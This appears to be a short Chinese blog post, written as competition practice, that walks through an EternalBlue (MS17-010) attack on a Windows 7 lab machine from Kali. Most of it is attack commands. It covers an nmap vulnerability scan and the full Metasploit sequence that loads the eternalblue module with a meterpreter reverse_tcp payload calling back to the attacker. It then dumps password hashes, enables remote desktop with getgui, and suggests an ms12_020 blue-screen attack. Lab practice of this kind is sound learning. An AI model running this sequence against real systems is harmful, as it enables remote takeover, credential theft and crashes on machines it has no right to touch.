由于铁三快开始了,最近复现一下内网的漏洞,昨天复现了一次永恒之蓝的攻击。
工具:msfconsole,nmap
目标机:192.168.137.187(Win7)
攻击机:192.168.137.188(kali)
首先对目标机器用nmap进行扫描:
1 | nmap -p445 --script smb-vuln-ms17-010 192.168.137.187 |
可以发现是存在ms17-010这个漏洞的,之后启动msfconsle,使用EternalBlue永恒之蓝攻击模块,设置攻击主机的ip,payload,监听ip及端口号,然后exploit。1
2
3
4
5
6msf > use exploit/windows/smb/ms17_010_eternalblue
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.137.187
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set LHOST 192.168.137.188
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > exploit
之后取得meterpreter回话,攻击成功。
获取hash值,得到帐号密码
开启3389
1 | meterpreter > run getgui -e |
telnet登录
发现是OK的。
开了3389以后还可以用ms12_020蓝屏攻击